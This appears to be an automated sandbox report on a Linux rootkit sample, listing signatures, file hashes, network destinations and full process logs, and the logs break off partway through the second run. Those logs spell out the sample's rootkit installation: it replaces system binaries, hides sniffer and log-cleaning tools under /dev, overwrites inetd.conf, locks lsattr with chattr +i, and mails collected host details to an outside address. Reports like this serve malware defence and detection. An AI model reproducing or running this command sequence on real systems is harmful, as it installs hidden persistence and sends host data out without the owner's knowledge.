Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-gce2wa1erb
Target 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
SHA256 522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954
Tags
antivm defense_evasion discovery
score
6/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
6/10

SHA256

522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954

Threat Level: Shows suspicious behavior

The file 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

Reads CPU attributes

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 05:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

2s

Max time network

129s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/15/cmdline /usr/bin/killall N/A
File opened for reading /proc/161/stat /usr/bin/killall N/A
File opened for reading /proc/245/stat /usr/bin/killall N/A
File opened for reading /proc/1063/stat /usr/bin/killall N/A
File opened for reading /proc/1121/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/164/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/172/stat /usr/bin/killall N/A
File opened for reading /proc/1121/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/997/cmdline /usr/bin/killall N/A
File opened for reading /proc/1140/stat /usr/bin/killall N/A
File opened for reading /proc/1177/stat /usr/bin/killall N/A
File opened for reading /proc/526/stat /usr/bin/killall N/A
File opened for reading /proc/1163/stat /usr/bin/killall N/A
File opened for reading /proc/1259/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/526/stat /usr/bin/killall N/A
File opened for reading /proc/1142/stat /usr/bin/killall N/A
File opened for reading /proc/1317/stat /usr/bin/killall N/A
File opened for reading /proc/663/cmdline /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/1171/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/79/cmdline /usr/bin/killall N/A
File opened for reading /proc/1059/stat /usr/bin/killall N/A
File opened for reading /proc/610/stat /usr/bin/killall N/A
File opened for reading /proc/1180/stat /usr/bin/killall N/A
File opened for reading /proc/36/cmdline /usr/bin/killall N/A
File opened for reading /proc/650/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/414/stat /usr/bin/killall N/A
File opened for reading /proc/431/cmdline /usr/bin/killall N/A
File opened for reading /proc/1101/cmdline /usr/bin/killall N/A
File opened for reading /proc/428/stat /usr/bin/killall N/A
File opened for reading /proc/1135/cmdline /usr/bin/killall N/A
File opened for reading /proc/1258/stat /usr/bin/killall N/A
File opened for reading /proc/438/stat /usr/bin/killall N/A
File opened for reading /proc/485/stat /usr/bin/killall N/A
File opened for reading /proc/333/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/761/stat /usr/bin/killall N/A
File opened for reading /proc/1502/stat /usr/bin/killall N/A
File opened for reading /proc/80/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/1086/stat /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/525/stat /usr/bin/killall N/A
File opened for reading /proc/35/stat /usr/bin/killall N/A
File opened for reading /proc/1240/stat /usr/bin/killall N/A
File opened for reading /proc/1379/stat /usr/bin/killall N/A
File opened for reading /proc/1073/cmdline /usr/bin/killall N/A
File opened for reading /proc/1316/stat /usr/bin/killall N/A
File opened for reading /proc/1342/cmdline /usr/bin/killall N/A
File opened for reading /proc/325/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 config-err-ESwDdV netplan_1iwncm7z snap-private-tmp ssh-GMXqXanC5C0k systemd-private-1020e78908244756830a6344ed1599c8-ModemManager.service-zJco20 systemd-private-1020e78908244756830a6344ed1599c8-bolt.service-lYyowF systemd-private-1020e78908244756830a6344ed1599c8-colord.service-J3gw7N systemd-private-1020e78908244756830a6344ed1599c8-systemd-resolved.service-9XdSFd systemd-private-1020e78908244756830a6344ed1599c8-systemd-timedated.service-hjXspn]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/bin/cat

[cat computer]

/bin/cat

[cat computer]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv swapfile sys tmp usr var vmlinuz vmlinuz.old]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/bin/grep

[grep inet]

/sbin/ifconfig

[/sbin/ifconfig]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/bin/cat

[cat computer]

/bin/cat

[cat computer]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.2:443 tcp

Files

/dev/rpm

MD5 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd
SHA1 76015ef9244670de728b830ad330c536f42c4e39
SHA256 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c
SHA512 1c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7

/dev/rpm

MD5 7d298531c8d0893706bf9c76a40f8386
SHA1 36f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf
SHA256 03d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a
SHA512 38f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973

/dev/rpm

MD5 1894a58fd103ccce773c667411597492
SHA1 248701dcabbff132054e34fd86f9afbd3746ea38
SHA256 0b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12
SHA512 c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a

/dev/rpm

MD5 1d0177d6d6d055555eb272249d89f54d
SHA1 6137ecd54c6ca43dbe4bc63a030b817a94a2a5e3
SHA256 cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e
SHA512 fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab

/dev/rpm

MD5 a56a4ee13c1681711fb6217ec17a8abc
SHA1 6193fa49399265b3efbc7ec47760a23749a278a3
SHA256 610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4
SHA512 86d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0

/dev/last

MD5 29b9e96e561662774c048aaf62f63f99
SHA1 0765b1eaf2054c54fe82e1326617d919f5f200fc
SHA256 76025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec
SHA512 1db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a

/dev/last

MD5 ed90c163bc4809cfba41afe945d8c3ac
SHA1 3fc77c1038907a6540022911bb9f74ab260ed576
SHA256 1b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954
SHA512 a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917

/dev/last

MD5 81ef1d399417bc7c03d5454d426e0e30
SHA1 e830de7de2fedc8688ded4335b6be7f0dcc2cf13
SHA256 6fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b
SHA512 89551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb

/dev/last

MD5 ea4abc4909616408ea03fca58e9daf78
SHA1 c368533d40cbcf2d43c2b0f493bced7496fedafd
SHA256 574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced
SHA512 92a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75

/dev/last

MD5 a2e384cb9bf939430cc6d44800052952
SHA1 3cafe08a106154033956aa6bbf2605e0ac94c290
SHA256 89558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532
SHA512 61aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058

/tmp/computer

MD5 74b613a2b176f69fe5c1e8d954eab63a
SHA1 12cb70fe1ffa49af49c298b543457662dc03abfc
SHA256 642aaf59eddd25f2db9dcbb56abbfbaadf44f6a56c0cdae642f29d4fb99aa10f
SHA512 54aae87c0c4104844a5900e29c38be09fa6f5e542ed63110d706cf85b208197d737397ca34eec88b1d04082ae5219651ebe7781cf60d1316a31c41165f760bda

/tmp/computer

MD5 0e60c2ce6cd47252c914ff3178290d15
SHA1 793e6bdb39acd41403f09ab838d4b0ed484898a7
SHA256 fc3631bac155e2062dcfa1f7208da8a0ea1bf137bf9dbe38f291a04c777cf106
SHA512 adeb4ab5f385df28a1a5d26c652ba08cd1b02daedf47dd5089a23f26d38fc40a6c8738dd3c08c611440751045a69004aa4b1b4da3e0d02613f366698be8a21b6

/tmp/computer

MD5 b411c1efe8afb4fc961fd64b8d6bfe35
SHA1 696a2b6b186b2cd349f34196aa18ae30f297207d
SHA256 c24169b2463eb9ea0ad37721d2cb7c429b90c5d436b71ad32052c814951c57ae
SHA512 ae647a8186c201e08695c6b3bc1a89c5dfe59fe21d7e4584d98ea4855cf02c66ede247b08ac7820ceaf60cb5bae7475bccc315f7e791940d3fd3e5353a9d42eb

/tmp/computer

MD5 e65718451e7f82b785a62b4dbb2dfe68
SHA1 2da2a421d8cd9bc35f9f2722dbce3b8c28e724f9
SHA256 25ed323c38ba36d3768f8c1bb1a67f9326e2b6e6b49a3cfe978f553547442005
SHA512 cac0ef0d8827fbae52525d4142d15a0df5ce987b32c441329601c3958387c1383cd57386b80d73345358a03fe2e9fe4885359af7978f18d654c9ff9cab60c0c4

/tmp/computer

MD5 c67f98b628b6ebae60f90357a88bae58
SHA1 312f8128b79009ed53cef92debefbf31fd5f24b4
SHA256 02f39a0d057762b6622a8143bde2fc99474f1d8adc424bc39954e3708525d04b
SHA512 f1b7120165ca294fdc6695b6f76df9908e844ebc4bea44d010e3f963f13791afb5878ccf7e59e8ff0c76ca19e609dc600018c76784fbfccc64f82c0c03908bb1

/tmp/computer

MD5 677a328e881f15f87509a110101a558a
SHA1 24f19a9ad1061bd54522ef4ebbfe6a63355472b6
SHA256 c006a0ae3ed9e83412e4231c98c23095ea47f2a7a5daa1dae68a66a7136de26b
SHA512 e39f7af709956680221277326d493bb58d0fd4666fedfebcd3ef554b8882782bf1787c8a9c35c8e8373fe5a47b617ec9f6bf6ab7c7cf68da3a1a4ed62604d1bb

/computer

MD5 1a82e4272e1c87385b059ebf8fd52572
SHA1 6c37312c8e55e2744cd3ad6f90123cadfaab9b4f
SHA256 5677d976c62a498530ded5fb30a75ce7053ec8df2e0b100895d3e287099b4f73
SHA512 3e3ce36da4d382d203c2e57b0d2a60a6ca06e84276789d45b87bca01c5957790b12616267110fa1c3ad2d118c7f99353b52c4fc667dc854d241d1d95f1206ada

/computer

MD5 859a800e55a211f6982b0411ba7421a9
SHA1 215f7a2227c88d52e56cdd4ec5de93c433d94498
SHA256 765d9173db6604d3d12dfff59628e66bbdd77e1360de5098991b187b545856f6
SHA512 74504ed28ccaa638395dff595238094b33ad768d579c7a6162f027142fcbcff2cae057a37373f70c99c2cc95ccc37863a15fd95cc0a5e645a5efdefa45574d3a

/computer

MD5 49bb556f7073a5a0a9febdc2b99857b8
SHA1 d8f1c8d341e6fb668c99e99b5fafb7a929602cc7
SHA256 25351496d9265f403fe0324d7637c6a8963ee39bf89a467e4e20ef952049b864
SHA512 a98993b63bbe9907b428c5f3cce23785066e66141a9fceb471667c9280483404e820516ac7b07e1239d597a1fed34b2b0a8a5c74aad0bbc4c6d0f10061004bee

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

debian9-armhf-20240611-en

Max time kernel

43s

Max time network

46s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/106/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/131/stat /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/450/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/uptime N/A
File opened for reading /proc/795/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/260/stat /usr/bin/killall N/A
File opened for reading /proc/261/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/409/stat /usr/bin/killall N/A
File opened for reading /proc/300/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/409/stat /usr/bin/killall N/A
File opened for reading /proc/607/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/402/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/657/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/104/stat /usr/bin/killall N/A
File opened for reading /proc/645/cmdline /usr/bin/killall N/A
File opened for reading /proc/753/stat /usr/bin/killall N/A
File opened for reading /proc/277/stat /usr/bin/killall N/A
File opened for reading /proc/645/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/141/stat /usr/bin/killall N/A
File opened for reading /proc/645/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/uptime N/A
File opened for reading /proc/644/stat /usr/bin/killall N/A
File opened for reading /proc/self/mountinfo /bin/df N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/330/stat /usr/bin/killall N/A
File opened for reading /proc/650/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/650/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/265/stat /usr/bin/killall N/A
File opened for reading /proc/644/cmdline /usr/bin/killall N/A
File opened for reading /proc/651/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/self/mountinfo /bin/df N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/104/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/muKWvbYf /usr/bin/mail N/A
File opened for modification /tmp/muNx9kPc /usr/bin/mail N/A
File opened for modification /tmp/muXDXqrW /usr/bin/mail N/A
File opened for modification /tmp/muAm1Fpy /usr/bin/mail N/A
File opened for modification /tmp/muJkovri /usr/bin/mail N/A
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A
File opened for modification /tmp/muHKzgkJ /usr/bin/mail N/A
File opened for modification /tmp/mumtFuBb /usr/bin/mail N/A
File opened for modification /tmp/mutly4gS /usr/bin/mail N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-5c956e0ac026463aa2ef8d8a8e193d3d-systemd-timedated.service-d1hXTd]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGZ-0000Bq-Hs]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGZ-0000Bq-Hs]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGe-0000C3-BH]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root bin boot dev etc home lib lost+found media mnt opt proc root run sbin srv sys tmp usr var]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGf-0000C6-0x]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

